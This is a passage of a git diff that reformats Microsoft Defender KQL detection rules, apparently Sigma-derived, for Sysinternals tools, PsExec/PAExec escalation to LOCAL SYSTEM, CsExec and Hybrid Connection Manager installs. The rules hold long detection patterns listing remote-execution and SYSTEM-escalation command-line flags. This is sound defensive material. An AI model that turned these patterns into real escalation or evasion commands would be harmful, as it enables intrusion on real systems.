Development/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql index d51376c7..1d45be71 100644 --- a/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql +++ b/KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql @@ -1,10 +1,10 @@ -// Title: HybridConnectionManager Service Installation - Registry -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2021-04-12 -// Level: high -// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1608 - -DeviceRegistryEvents +// Title: HybridConnectionManager Service Installation - Registry +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2021-04-12 +// Level: high +// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1608 + +DeviceRegistryEvents | where RegistryKey contains "\\Services\\HybridConnectionManager" or (RegistryValueData contains "Microsoft.HybridConnectionManager.Listener.exe" and ActionType =~ "RegistryValueSet") \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql index b7515c03..5c2e7cfe 100644 --- a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql +++ b/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql @@ -1,13 +1,13 @@ -// Title: Potential Execution of Sysinternals Tools -// Author: Markus Neis -// Date: 2017-08-28 -// Level: low -// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Legitimate use of SysInternals tools -// - Programs that use the same command line flag - -DeviceProcessEvents +// Title: Potential Execution of Sysinternals Tools +// Author: Markus Neis +// Date: 2017-08-28 +// Level: low +// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Legitimate use of SysInternals tools +// - Programs that use the same command line flag + +DeviceProcessEvents | where ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula" \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql index 9c262e44..46f43302 100644 --- a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql +++ b/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql @@ -1,13 +1,13 @@ -// Title: Potential Privilege Escalation To LOCAL SYSTEM -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-05-22 -// Level: high -// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 -// False Positives: -// - Weird admins that rename their tools -// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing - -DeviceProcessEvents +// Title: Potential Privilege Escalation To LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-05-22 +// Level: high +// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Weird admins that rename their tools +// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing + +DeviceProcessEvents | where (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") and (not((ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql index 5e52c28e..8e770913 100644 --- a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql +++ b/KQL/rules/Resource Development/potential_psexec_remote_execution.kql @@ -1,10 +1,10 @@ -// Title: Potential PsExec Remote Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-28 -// Level: high -// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 - -DeviceProcessEvents +// Title: Potential PsExec Remote Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: high +// Description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "accepteula" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " \\\\") and (not((ProcessCommandLine contains "\\\\localhost" or ProcessCommandLine contains "\\\\127."))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql index ca3b3936..b822e5f9 100644 --- a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql +++ b/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql @@ -1,13 +1,13 @@ -// Title: PsExec/PAExec Escalation to LOCAL SYSTEM -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-11-23 -// Level: high -// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 -// False Positives: -// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) -// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension - -DeviceProcessEvents +// Title: PsExec/PAExec Escalation to LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-23 +// Level: high +// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) +// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + +DeviceProcessEvents | where (ProcessCommandLine contains "psexec" or ProcessCommandLine contains "paexec" or ProcessCommandLine contains "accepteula") and (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_csexec_execution.kql b/KQL/rules/Resource Development/pua_csexec_execution.kql index e8917c10..c48bd7b9 100644 --- a/KQL/rules/Resource Development/pua_csexec_execution.kql +++ b/KQL/rules/Resource Development/pua_csexec_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - CsExec Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-22 -// Level: high -// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002 - -DeviceProcessEvents +// Title: PUA - CsExec Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002 + +DeviceProcessEvents | where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec" \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql index 0dbbf755..16790602 100644 --- a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql +++ b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql @@ -1,13 +1,13 @@ -// Title: PUA - Sysinternal Tool Execution - Registry -// Author: Markus Neis -// Date: 2017-08-28 -// Level: low -// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Legitimate use of SysInternals tools -// - Programs that use the same Registry Key - -DeviceRegistryEvents +// Title: PUA - Sysinternal Tool Execution - Registry +// Author: Markus Neis +// Date: 2017-08-28 +// Level: low +// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Legitimate use of SysInternals tools +// - Programs that use the same Registry Key + +DeviceRegistryEvents | where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file diff --git a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql index d3ff592c..b69bf4bd 100644 --- a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql +++ b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql @@ -1,12 +1,12 @@ -// Title: PUA - Sysinternals Tools Execution - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-24 -// Level: medium -// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment - -DeviceRegistryEvents +// Title: PUA - Sysinternals Tools Execution - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: medium +// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment + +DeviceRegistryEvents | where ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted" \ No newline at end of file diff --git a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql index cb5b7879..df3db5cf 100644 --- a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql +++ b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed SysInternals DebugView Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2020-05-28 -// Level: high -// Description: Detects suspicious renamed SysInternals DebugView execution -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 - -DeviceProcessEvents +// Title: Renamed SysInternals DebugView Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-28 +// Level: high +// Description: Detects suspicious renamed SysInternals DebugView execution +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 + +DeviceProcessEvents | where ProcessVersionInfoProductName =~ "Sysinternals DebugView" and (not((FolderPath endswith "\\Dbgview.exe" and ProcessVersionInfoOriginalFileName =~ "Dbgview.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql index bd4f091f..71f6738d 100644 --- a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql +++ b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-24 -// Level: high -// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql index 5aeb0935..401bbb74 100644 --- a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql +++ b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Keyboard Layout Load -// Author: Florian Roth (Nextron Systems) -// Date: 2019-10-12 -// Level: medium -// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only -// MITRE Tactic: Resource Development -// 